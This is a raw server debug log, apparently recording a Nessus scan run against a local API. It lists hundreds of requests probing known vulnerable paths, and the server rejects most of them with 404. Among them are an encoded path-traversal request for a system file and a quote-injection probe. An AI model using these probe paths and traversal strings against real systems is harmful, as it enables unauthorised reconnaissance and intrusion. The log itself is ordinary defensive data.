+2022-11-01T23:22:01.368Z debug: [1667344921366, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.374Z debug: [1667344921373, duration: 0] GET:/api/dndirector/dashboard/Show.dn, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.400Z debug: [1667344921399, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.407Z debug: [1667344921406, duration: 0] GET:/api/dndirector, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.433Z debug: [1667344921431, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.438Z debug: [1667344921438, duration: 0] GET:/api/btmui/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.460Z debug: [1667344921459, duration: 1] GET:/api/apex/f?p=nessuscheck, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.463Z debug: [1667344921462, duration: 1] GET:/api/pls/apex/f?p=nessuscheck, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.485Z debug: [1667344921483, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.491Z debug: [1667344921491, duration: 0] GET:/api/cgi-bin/luci, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.550Z debug: [1667344921549, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.556Z debug: [1667344921555, duration: 1] GET:/api/dwr/index.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.580Z debug: [1667344921579, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.588Z debug: [1667344921587, duration: 0] GET:/api/login.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.612Z debug: [1667344921611, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.618Z debug: [1667344921617, duration: 1] GET:/api/cgi-bin/pub/pki?cmd=serverInfo, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.655Z debug: [1667344921652, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.659Z debug: [1667344921658, duration: 1] GET:/api/ofbizsetup/control/checkLogin, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.666Z debug: [1667344921665, duration: 0] GET:/api/ordermgr/control/checkLogin, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.705Z debug: [1667344921704, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.711Z debug: [1667344921710, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.735Z debug: [1667344921734, duration: 0] GET:/api/netbasic/websinfo.bas, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.737Z debug: [1667344921737, duration: 0] GET:/api/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.742Z debug: [1667344921741, duration: 0] GET:/api/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.745Z debug: [1667344921744, duration: 0] GET:/api/perl/samples/lancgi.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.746Z debug: [1667344921746, duration: 0] GET:/api/perl/samples/ndslogin.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.748Z debug: [1667344921748, duration: 0] GET:/api/perl/samples/volscgi.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.749Z debug: [1667344921749, duration: 0] GET:/api/perl/samples/env.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.751Z debug: [1667344921750, duration: 1] GET:/api/nsn/env.bas, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.752Z debug: [1667344921752, duration: 0] GET:/api/nsn/fdir.bas, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.797Z debug: [1667344921796, duration: 1] GET:/api/util/chkvol.bas, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.800Z debug: [1667344921799, duration: 1] GET:/api/util/dir.bas, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.802Z debug: [1667344921801, duration: 1] GET:/api/util/glist.bas, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.805Z debug: [1667344921804, duration: 1] GET:/api/util/lancard.bas, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.807Z debug: [1667344921806, duration: 1] GET:/api/util/set.bas, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.810Z debug: [1667344921809, duration: 0] GET:/api/util/userlist.bas, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.811Z debug: [1667344921811, duration: 0] GET:/api/web/env.bas, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.813Z debug: [1667344921813, duration: 0] GET:/api/webdemo/fdir.bas, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.846Z debug: [1667344921845, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.853Z debug: [1667344921853, duration: 0] GET:/api/nps/servlet/portal, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.880Z debug: [1667344921879, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.887Z debug: [1667344921886, duration: 1] GET:/api/IDMProv/jsps/help/Help.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.914Z debug: [1667344921912, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.920Z debug: [1667344921919, duration: 1] GET:/api/gwadmin-console/login.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.947Z debug: [1667344921946, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:01.953Z debug: [1667344921953, duration: 0] GET:/api/logout, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:01.997Z debug: [1667344921996, duration: 1] GET:/api/examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/system/autoexec.ncf, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.013Z debug: [1667344922012, duration: 1] POST:/api/perl/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.027Z debug: [1667344922026, duration: 1] GET:/api/help/contents.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.029Z debug: [1667344922028, duration: 0] GET:/api/manual/ag/contents.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.048Z debug: [1667344922047, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.058Z debug: [1667344922057, duration: 0] GET:/api/images, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.082Z debug: [1667344922080, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.087Z debug: [1667344922086, duration: 0] GET:/api/baselining/version, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.112Z debug: [1667344922110, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.117Z debug: [1667344922116, duration: 1] GET:/api/nps/servlet/portalservice, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.144Z debug: [1667344922143, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.151Z debug: [1667344922150, duration: 1] GET:/api/debuginfo.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.176Z debug: [1667344922173, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.185Z debug: [1667344922183, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.211Z debug: [1667344922209, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.218Z debug: [1667344922216, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.243Z debug: [1667344922241, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.248Z debug: [1667344922247, duration: 1] GET:/api/qsoap.qap, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.272Z debug: [1667344922271, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.280Z debug: [1667344922279, duration: 1] GET:/api/login.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.311Z debug: [1667344922308, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.317Z debug: [1667344922316, duration: 1] GET:/api/nacos/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.342Z debug: [1667344922341, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.348Z debug: [1667344922347, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.350Z debug: [1667344922350, duration: 0] GET:/api/Help.action, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.394Z debug: [1667344922393, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.401Z debug: [1667344922400, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.432Z debug: [1667344922430, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.438Z debug: [1667344922437, duration: 1] GET:/api/mod_gzip_status, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.473Z debug: [1667344922472, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.479Z debug: [1667344922478, duration: 0] GET:/api/uddipublic/default.aspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.485Z debug: [1667344922484, duration: 0] GET:/api/uddi/default.aspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.528Z debug: [1667344922527, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.533Z debug: [1667344922533, duration: 0] GET:/api/Explorer/index.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.557Z debug: [1667344922555, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.562Z debug: [1667344922561, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.585Z debug: [1667344922584, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.591Z debug: [1667344922591, duration: 0] GET:/api/sabin/SiteAdmin.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.623Z debug: [1667344922622, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.629Z debug: [1667344922629, duration: 0] GET:/api/admin/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.636Z debug: [1667344922635, duration: 1] GET:/api/admin/LocalIndex.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.642Z debug: [1667344922641, duration: 0] GET:/api/scmadmin/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.648Z debug: [1667344922647, duration: 0] GET:/api/scmadmin/LocalIndex.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.684Z debug: [1667344922683, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.690Z debug: [1667344922690, duration: 0] GET:/api/reporter/client.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.718Z debug: [1667344922717, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.724Z debug: [1667344922723, duration: 0] GET:/api/index.exp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.750Z debug: [1667344922749, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.758Z debug: [1667344922756, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.800Z debug: [1667344922795, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.806Z debug: [1667344922805, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.835Z debug: [1667344922834, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.842Z debug: [1667344922842, duration: 0] GET:/api/core/orionSplashScreen.do, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.873Z debug: [1667344922872, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.880Z debug: [1667344922878, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.905Z debug: [1667344922903, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.914Z debug: [1667344922913, duration: 1] GET:/api/login.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:02.941Z debug: [1667344922940, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.947Z debug: [1667344922946, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:02.994Z debug: [1667344922992, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.000Z debug: [1667344923000, duration: 0] POST:/api/servlet/GetProductVersion, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.026Z debug: [1667344923024, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.033Z debug: [1667344923032, duration: 1] GET:/api/PassTrixMain.cc, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.058Z debug: [1667344923056, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.083Z debug: [1667344923082, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.089Z debug: [1667344923088, duration: 0] GET:/api/LoginPage.do, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.094Z debug: [1667344923094, duration: 0] GET:/api/LoginPage.do, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.125Z debug: [1667344923123, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.131Z debug: [1667344923130, duration: 1] GET:/api/netflow/html/aboutus.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.156Z debug: [1667344923155, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.162Z debug: [1667344923161, duration: 1] GET:/api/LoginPage.do, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.189Z debug: [1667344923188, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.217Z debug: [1667344923215, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.222Z debug: [1667344923222, duration: 0] GET:/api/login.do, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.230Z debug: [1667344923229, duration: 1] GET:/api/help/introduction/release-notes.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.260Z debug: [1667344923259, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.270Z debug: [1667344923269, duration: 0] GET:/api/event/index.do, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.299Z debug: [1667344923297, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.306Z debug: [1667344923305, duration: 0] GET:/api/NCMContainer.cc, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.332Z debug: [1667344923331, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.337Z debug: [1667344923337, duration: 0] GET:/api/configurations.do, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.370Z debug: [1667344923368, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.375Z debug: [1667344923374, duration: 1] GET:/api/index.do, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.399Z debug: [1667344923398, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.428Z debug: [1667344923426, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.458Z debug: [1667344923457, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.487Z debug: [1667344923485, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.493Z debug: [1667344923492, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.529Z debug: [1667344923529, duration: 0] GET:/api/smconf.nsf, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.531Z debug: [1667344923531, duration: 0] GET:/api/smadmr5.nsf, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.533Z debug: [1667344923532, duration: 0] GET:/api/smency.nsf, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.534Z debug: [1667344923534, duration: 0] GET:/api/smftypes.nsf, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.535Z debug: [1667344923535, duration: 0] GET:/api/smsmvlog.nsf, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.537Z debug: [1667344923536, duration: 1] GET:/api/smhelp.nsf, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.539Z debug: [1667344923538, duration: 0] GET:/api/smmsg.nsf, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.540Z debug: [1667344923540, duration: 0] GET:/api/smtime.nsf, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.542Z debug: [1667344923541, duration: 0] GET:/api/smquar.nsf, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.577Z debug: [1667344923575, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.583Z debug: [1667344923582, duration: 1] GET:/api/stcenter.nsf, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.588Z debug: [1667344923588, duration: 0] GET:/api/Sametime/buildinfo.txt, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.594Z debug: [1667344923593, duration: 1] GET:/api/Sametime/domino/html/sametime/buildinfoST75CF1.txt, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:03.622Z debug: [1667344923620, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.628Z debug: [1667344923627, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.654Z debug: [1667344923653, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:03.661Z debug: [1667344923659, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.248Z debug: [1667344926246, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.258Z debug: [1667344926257, duration: 0] GET:/api/HNAP1/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:06.290Z debug: [1667344926288, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.297Z debug: [1667344926296, duration: 1] GET:/api/mve/help/en/inventory/am_about.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:06.330Z debug: [1667344926328, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.337Z debug: [1667344926336, duration: 1] POST:/api/jsonrpc, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:06.370Z debug: [1667344926368, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.378Z debug: [1667344926377, duration: 1] POST:/api/server/service/smsConfigServiceHttpInvoker, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:06.418Z debug: [1667344926416, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.424Z debug: [1667344926423, duration: 1] GET:/api/api/v1.0/environment, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:06.453Z debug: [1667344926451, duration: 1] GET:/api/vsapres/web20/core/login.aspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:06.500Z debug: [1667344926497, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.507Z debug: [1667344926506, duration: 1] GET:/api/mainui/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:06.538Z debug: [1667344926537, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.547Z debug: [1667344926545, duration: 1] GET:/api/assets/js/conf/global_config.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:06.579Z debug: [1667344926577, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.587Z debug: [1667344926586, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.619Z debug: [1667344926617, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.626Z debug: [1667344926625, duration: 1] GET:/api/WEB-INF/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:06.660Z debug: [1667344926659, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.668Z debug: [1667344926667, duration: 1] GET:/api/invoker/EJBInvokerServlet, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:06.671Z debug: [1667344926670, duration: 0] GET:/api/invoker/JMXInvokerServlet, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:06.715Z debug: [1667344926711, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.723Z debug: [1667344926723, duration: 0] GET:/api/web-console/ServerInfo.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:06.751Z debug: [1667344926749, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.781Z debug: [1667344926778, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.791Z debug: [1667344926788, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.839Z debug: [1667344926837, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.846Z debug: [1667344926845, duration: 1] GET:/api/NASApp/nessus/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:06.888Z debug: [1667344926886, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.895Z debug: [1667344926894, duration: 1] GET:/api/NASApp/nessus/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:06.928Z debug: [1667344926926, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:06.934Z debug: [1667344926933, duration: 1] GET:/api/home.seam, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:06.969Z debug: [1667344926968, duration: 0] GET:/api/interscan/cgi-bin/FtpSave.dll?I'm%20Here, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:06.995Z debug: [1667344926993, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.038Z debug: [1667344927036, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.045Z debug: [1667344927044, duration: 0] GET:/api/status.php3, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.053Z debug: [1667344927052, duration: 0] GET:/api/imp/status.php3, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.060Z debug: [1667344927059, duration: 1] GET:/api/horde/imp/status.php3, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.108Z debug: [1667344927106, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.116Z debug: [1667344927115, duration: 1] GET:/api/iisprotect/admin/GlobalAdmin.asp?V_FirstTab=GlobalSetting, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.144Z debug: [1667344927142, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.151Z debug: [1667344927150, duration: 1] GET:/api/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=nessus, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.159Z debug: [1667344927157, duration: 2] GET:/api/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=nessus', reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.198Z debug: [1667344927197, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.205Z debug: [1667344927204, duration: 1] GET:/api/iissamples/issamples/fastq.idq, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.212Z debug: [1667344927211, duration: 0] GET:/api/iissamples/issamples/query.idq, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.220Z debug: [1667344927219, duration: 0] GET:/api/iissamples/exair/search/search.idq, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.228Z debug: [1667344927226, duration: 0] GET:/api/iissamples/exair/search/query.idq, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.233Z debug: [1667344927232, duration: 1] GET:/api/iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.239Z debug: [1667344927238, duration: 1] GET:/api/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.245Z debug: [1667344927245, duration: 0] GET:/api/scripts/samples/search/author.idq, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.252Z debug: [1667344927251, duration: 0] GET:/api/scripts/samples/search/filesize.idq, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.259Z debug: [1667344927258, duration: 1] GET:/api/scripts/samples/search/filetime.idq, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.268Z debug: [1667344927266, duration: 0] GET:/api/scripts/samples/search/queryhit.idq, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.275Z debug: [1667344927274, duration: 0] GET:/api/scripts/samples/search/simple.idq, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.285Z debug: [1667344927284, duration: 0] GET:/api/iissamples/exair/howitworks/codebrws.asp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.295Z debug: [1667344927292, duration: 2] GET:/api/iissamples/issamples/query.asp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.366Z debug: [1667344927364, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.376Z debug: [1667344927373, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.379Z debug: [1667344927378, duration: 0] GET:/api/hWBXyJbe.asp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.422Z debug: [1667344927421, duration: 0] GET:/api/NULL.ida, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.449Z debug: [1667344927447, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.456Z debug: [1667344927455, duration: 0] GET:/api/niet964457317, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.469Z debug: [1667344927469, duration: 0] GET:/api/niet1932000582., reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.473Z debug: [1667344927472, duration: 1] GET:/api/iissamples/sdk/asp/docs/codebrws.asp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.478Z debug: [1667344927477, duration: 1] GET:/api/niet821154138.asp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.488Z debug: [1667344927487, duration: 1] GET:/api/niet1603637333.aspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.493Z debug: [1667344927491, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.495Z debug: [1667344927495, duration: 0] GET:/api/niet828442186.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.500Z debug: [1667344927499, duration: 0] GET:/api/iisadmpwd/aexp.htr, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.503Z debug: [1667344927503, duration: 0] GET:/api/niet1992530431.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.506Z debug: [1667344927505, duration: 1] GET:/api/iisadmpwd/aexp2.htr, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.510Z debug: [1667344927510, duration: 0] GET:/api/niet531992248.shtm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.513Z debug: [1667344927512, duration: 1] GET:/api/iisadmpwd/aexp2b.htr, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.523Z debug: [1667344927522, duration: 1] GET:/api/iisadmpwd/aexp3.htr, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.525Z debug: [1667344927524, duration: 0] GET:/api/niet1541890362.shtml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.530Z debug: [1667344927528, duration: 1] GET:/api/iisadmpwd/aexp4.htr, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.532Z debug: [1667344927531, duration: 0] 